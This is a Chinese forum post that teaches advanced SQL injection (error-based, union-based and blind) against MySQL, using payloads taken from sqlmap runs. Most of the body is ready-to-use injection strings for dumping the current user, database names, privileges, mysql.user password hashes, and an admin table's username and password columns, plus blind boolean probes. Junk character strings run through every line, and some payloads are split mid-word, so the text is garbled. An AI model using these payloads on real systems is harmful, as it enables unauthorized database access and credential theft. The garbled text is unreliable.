放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
7 I% V7 R" M# B' [( W4 \5 V U' y , k" X7 n0 t* R) p
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
# Q4 H7 o: P1 \- v% M
# } k$ r( F4 D' V/ i7 |. n$ K分类标准 分类 备注" V5 L5 C, E& U+ s2 b8 m
按字段类型 整型注入,字符型注入 5 g( @: G8 _- y9 h
按出现的位置 get注入,post注入,cookie注入,http header注入
" i/ u$ J. T; ^, q! J% [; |+ x然而高级注入是这样的. I9 y7 O& k, d% t j3 y) n: F8 X! p
: ]6 s0 Z4 B- X% } @) ?高级注入分类 条件
# R# S1 X; l3 _+ `error-based sql 数据库的错误回显可以返回,存在数据库,表结构' s: C# h8 m+ J8 y) t5 G" H* n, o& u8 i
union-based sql 能够使用union,存在数据库,表结构
5 @# e* [) U+ x; A+ j+ e& y |blind sql 存在注入
. t$ S# u# H1 H我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。, q% @8 D4 N B% e
- C4 s9 v" t+ i. l' M2 ]/ q* k
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火! c- n# a$ p: W d
% Q6 K; V5 U5 o `. n0 L
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
& f. p: p" K8 [3 }9 @9 e1 O
0 r1 n8 ~/ t# H) H# a这里用mysql说明" _; F# p7 p8 ?; s" X3 A$ A
|& g# u- e5 ] r; \: s( U
e注入坛子里很多了,请看戳我或者再戳我
' I. F! C+ k+ t1 r8 G7 i! a+ ]* Q+ M9 ^ & i }0 F, P. u0 Z
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的9 a! L% |9 X7 u' U
& j; m& R. u8 }+ Q3 L获取当前数据库用户名- ~2 U# I; H: D7 w# }+ `1 F
$ H$ K( d+ r: z3 MUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C% g4 h; \% U2 G. F% ]! g. V3 ~
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL/ e% h8 Q" A R( z; A+ E% {* Y
L, NULL#& Y' x8 W- I* a, y2 M2 {
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。+ `. M# h& z+ f4 }/ ~( O" |$ ^
6 _3 | l6 P+ A* h8 Q( w8 o k2 U
获取数据库名
8 e2 R" d" V( I3 A5 R ; B7 |1 F1 {/ `$ c s2 j# J
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# [ |5 R% X. q/ U3 b
获取所有用户名
2 ~( U }2 H) Z2 r1 T. z & r5 w0 ` j9 H1 y- s$ c
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#8 l" r: Q, }# G( H7 y
查看当前用户权限
# f5 W2 W" h* s9 A+ T ; S2 l7 r; |- o$ s. S# ~: j
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#2 A' u4 G. ?% n3 O
尝试获取密码,当然需要有能读mysql数据库的权限
6 C- \6 x& M( D9 Z! _2 _3 k
9 {5 C5 V- `8 V j. I% BUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#7 C$ R' B$ k) K( b) `, c
获取表名,limit什么的自己搞啦
# i# A! K( J n- C; X
3 m( u6 J' H) x' K" n$ I4 ]/ l# \UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
7 }) {% ^ N! V; K+ h: k! K# n获取字段名及其类型
) h! i' r' q6 P7 W9 ^. [- {UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#( ^6 l" u, I: B S8 M; c
3 V ?+ i- a& I( Lb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。8 P3 _5 `$ b+ l' c. m( J
' ^8 e) T6 {& w! g# n
如:5 n: [8 _# c' e, ]
获取当前用户名
, p& t& h9 f: Y: E( {+ N
% M3 G4 X4 u& ?& e' {AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116' f$ T: c2 ^- B( v+ D7 e$ D
获取当前数据库
3 K% ^5 [! g5 s
1 h; y5 m- Q' M& dAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
$ D( E( M4 ~: z$ A b& k8 o: p: l获取表名4 f/ G% c+ W) f
. z/ J1 | R( ]2 `AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51- ` g3 U5 L9 H1 |8 ~; [
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。' p6 h. _" G C6 Q7 I
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。& |* U- R! Z& r# K
爆表& V) u9 x7 [8 h% ~( Q* f
6 w) l4 z$ e# T$ y4 k
AND EXISTS(select * from table). K9 t+ m! K) j% u9 S& @
爆字段5 q. W4 B" c$ _* O) |( q; \
! I9 s. \9 [: J E( TAND EXISTS(select pwd from table)
, j! M& u0 T# @* O: ?盲注的变化就比较多了,由于篇幅,只是举个例子而已。& V6 h' ^5 E3 j
( E( {0 m3 H) r0 X本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。" |0 `5 ?; p" x
|